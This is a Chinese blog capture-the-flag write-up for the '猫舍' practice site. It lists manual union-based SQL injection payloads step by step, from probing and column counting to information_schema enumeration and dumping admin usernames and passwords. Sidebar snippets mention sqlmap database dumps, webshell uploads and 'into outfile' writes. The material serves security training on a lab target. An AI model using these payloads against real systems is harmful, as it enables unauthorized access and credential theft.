猫舍writeup

最新推荐文章于 2024-04-21 18:59:30 发布
最新推荐文章于 2024-04-21 18:59:30 发布
阅读量319 收藏
点赞数 2
文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55563900/article/details/114175786
版权

猫舍writeup

在这里插入图片描述
第一步:判断是否存在sql注入漏洞
构造语句 ?id=1 and 1=1
在这里插入图片描述
页面返回正常
再次构造语句 ?id=1 and 1=2
在这里插入图片描述
返回页面不正常,初步判断可能存在一个注入漏洞
第二步:判断字数段
构造语句 ?id=1 and 1=1 order by 1
在这里插入图片描述
页面正常
构造 ?id=1 and 1=1 order by 2
在这里插入图片描述
页面还是正常
再次构造 ?id=1 and 1=1 order by 3
在这里插入图片描述
页面返回错误,判断字数为 2
第三步 判断回显点
构造语句 ?id=1 and 1=2 union select 1,2
在这里插入图片描述
页面出现2 说明2处使我们想要的内容
第四步:查询相关内容
构造语句 ?id=1 and 1=2 union select 1,database()
在这里插入图片描述
查看当前数据库版本
构造语句 ?id=1 and 1=2 union select 1,version()
在这里插入图片描述
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
在这里插入图片描述
查到用户admin 绝大多情况下管理员的账号和密码都在admin里

查询字段名
构造
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1
在这里插入图片描述
构造
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 1,1
在这里插入图片描述
构造
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 2,1
在这里插入图片描述
查出 admin 表里 有 id username password 三个字段

查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回车
在这里插入图片描述
构造 ?id=1 and 1=2 union select 1,username from admin limit 1,1 回车
在这里插入图片描述
发现中文字 应该是不对的 说明还有另一个用户

构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1
在这里插入图片描述
找到flag

&Lj
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqlmap自动化注入猫舍靶场练习
weixin_45540609的博客
04-15 896
使用 python sqlmap.py -u 加上url 扫描存在漏洞,一路enter,paramenter显示有bool盲注 --dbs查看有哪些数据库,然后-D进入maoshe数据库 --tables查看有哪些数据表,-T进入数据表admin --columns查看有哪些字段 算了,直接在admin后面加 --dump脱库吧!铛铛,成功! ...
WhiteXB.github.io:白筱の猫舍
03-27
WhiteXB.github.io:白筱の猫舍
xss挑战赛writeup
Rock的专栏
11-20 3801
xss挑战赛writeup Posted by: admin 2014年9月22日 Web安全 留下评论 挑战地址:http://prompt.ml/0 from:https://github.com/cure53/xss-challenge-wiki/wiki/prompt.ml 规则: 成功执行prompt(1) payload不需要用户
封神台——手工注入基础(猫舍
Zichel77的博客
07-04 7906
题目提示很明显,就是sql注入拿到管理员密码 点击传送门进入看到的是一个很简陋的猫舍页面 域名简单,没看到注入点http://59.63.200.79:8003/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标urlhttp://59.63.200.79:8003/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 .
手工注入(猫舍为例)
Greedy Hat的博客
07-31 2158
显错注入实例
网站综合渗透实验 writeup
3569
07-30 2430
感受 ,做这些实验主要难点我感觉就是上传webshell 了,他插入shell的姿势让我防不胜防,这里插那里插,上一个实验还需要闭合引号,这个实验不用闭合引号,上个实验路径比较简单,这个实验路径比较复杂,尤其是 bear.asp的文件是数据库文件 … 想了好久才想通,到底为什么不用闭合引号 … 为什么路径是/db/bear.asp … 上传sehll有两种方法,都学习了是不吃亏的哦 ~实验过程 :
猫舍室内装饰设计模型
07-31
猫舍室内装饰设计模型】是一种专为满足猫咪生活需求和人类审美而设计的专业室内设计方案。这个模型结合了3D设计技术,旨在创造出既实用又美观的猫舍环境,为猫咪提供一个舒适、有趣的活动空间,同时也能成为家居...
简易的猫舍管理系统.zip
03-13
《简易的猫舍管理系统》是一款专为猫舍日常运营设计的管理软件,旨在提升猫舍的管理水平,优化工作流程,确保猫咪的生活质量和客户服务质量。本文将深入解析该系统的各项功能和设计原理,帮助用户理解和应用。 一、...
猫舍静态网页可跳转源代码
最新发布
06-21
"猫舍静态网页可跳转源代码"是一个关于创建静态网页的项目,它可能包含了实现网页间跳转的功能。接下来,我们将深入探讨相关知识点。 首先,HTML(HyperText Markup Language)是构成网页的基础语言,用于定义网页...
商业计划书PPT模板粉色简约风猫舍咖啡馆创业招商计划书.pptx
10-19
【商业计划书PPT模板】制作一份成功的商业计划书,对于任何创业者来说都是至关重要的,尤其是对于想要开设猫舍咖啡馆的企业家。这份粉色简约风格的PPT模板为创业者提供了结构化的框架,帮助他们清晰地阐述自己的创业...
02-16
基于FastAdmin开发的CMS管理系统 学习笔记 安装 git克隆FastAdmin,进入目录 下载前端插件依赖包bower install 如果没安装bower需要先安装,npm install bower -g 下载PHP依赖包composer安装 如果遇到问题:overtrue / wechat 4.2.11要求ext-fileinfo *->您的系统中缺少所请求PHP扩展fileinfo。因为公众php_fileinfo这个扩展,打开即可 账号信息 后台账号:admin 123456
墨者学院在线靶场writeup
john_david_的博客
02-14 5066
入门 WEB页面源代码查看 打开是一个HTML页面,鼠标右键被禁用,直接F12,控制台点Elements看源代码,就发现key了 WEB页面分析 打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key 服务器返回数据查看 F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key 浏览器信息伪造...
upload-labs 上传漏洞靶场环境以及writeup
iqiqiya的博客
09-07 4548
一个帮你总结所有类型的上传漏洞的靶场https://github.com/c0ny1/upload-labs 靶场环境(基于phpstudy这个php集成环境)https://github.com/c0ny1/upload-labs/releases upload-labs 上传漏洞靶场的解题方法https://github.com/LandGrey/upload-labs-writeup ...
三个白帽挑战赛第二期的writeup(详细记录一系列的坑) [代码审计]
qq_28247467的博客
03-30 1280
post by answer / 2016-3-25 20:41 Friday 首先想说这是我见过的最绕的题目了,不得不说出题人的思路太猥琐。   首先在访问http://8ed0a7d1a5ed5b5ac.jie.sangebaimao.com/sangebaomao.zip得到源码。根据tips是二次注入还要getshell。看着就带劲。   一、先看看文件吧       其中in
【附源码】基于flask框架猫舍管理系统分析与设计 (python+mysql+论文)
真纯Django毕设程序
04-21 793
综上所述,猫舍管理系统不仅能够提升猫舍内部的管理水平,还能够对外展示猫舍的良好形象,吸引更多的爱猫人士参与到猫咪的领养与关爱中来,具有深远的社会价值和实践意义。该系统将利用现代网络技术,实现猫舍内部管理的信息化、自动化,从而提高管理效率,确保猫咪的健康和福利,同时也为爱猫人士提供一个更加便捷、透明的服务平台。在数据库管理工具的选择上,使用了Navicat 11,这是一个用户友好且功能强大的数据库管理软件,它支持多种数据库系统,包括MySQL,并提供了图形化界面,使得数据库的管理和维护工作更加便捷。
猫舍内网靶场
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-28 1343
内网渗透 我们首先先讲一下,如何去利用sql注入漏洞 先讲两个导出文件的函数 into dumpfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径 into outfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径 但是一般都用不了这两个函数,他和loadfile()一起的,如果能用loadfile() ,那代表这两个函数也能用 原因是:mysql.ini的配置问题,要手动添加一个配置 select 1,2,
[转]order by 1是什么意思?
weixin_30318645的博客
06-20 1109
ORDER BY 1 表示 所select 的字段按第一个字段排序ORDER BY ASC应该没有这样写法,ORDER BY 后面不是字段就是数字,可以ORDER BY 1 ASC 或者ORDER BY COL1 ASCASC表示按升序排序,DESC表示按降序排序 来源:http://doudouweed.blog.sohu.com/120271609.html 转载于:https:...
猫舍-sql注入
tlucky的博客
04-16 2464
漏洞地址 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 漏洞类型 Sql注入 漏洞描述及危害 sql注入是一种将sql代码插入或添加到应用用户的输入参数中,再将这些参数传递给后台的sql服务器加以解析并执行。Sql注入会导致数据库信息泄露,网页被篡改,数据库被恶意操作,服务器被远程控制和被种植木马等多种危害。 漏洞详情 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 属于数字型注入 ①数据库名 ②表名 http://
ctf实战 掌控安全的靶场 第一关通关记录
wh1te 小白的博客
09-17 5820
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
大一html网页制作作业 猫舍寄养
06-02
如果题目是猫舍寄养,那么可以考虑以下内容: 1. 页面布局:设计页面的整体布局,如头部、导航栏、内容区域等,可以使用CSS进行美化。 2. 导航栏:在页面的顶部或侧边添加导航栏,可以包括关于我们、服务介绍、价格...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值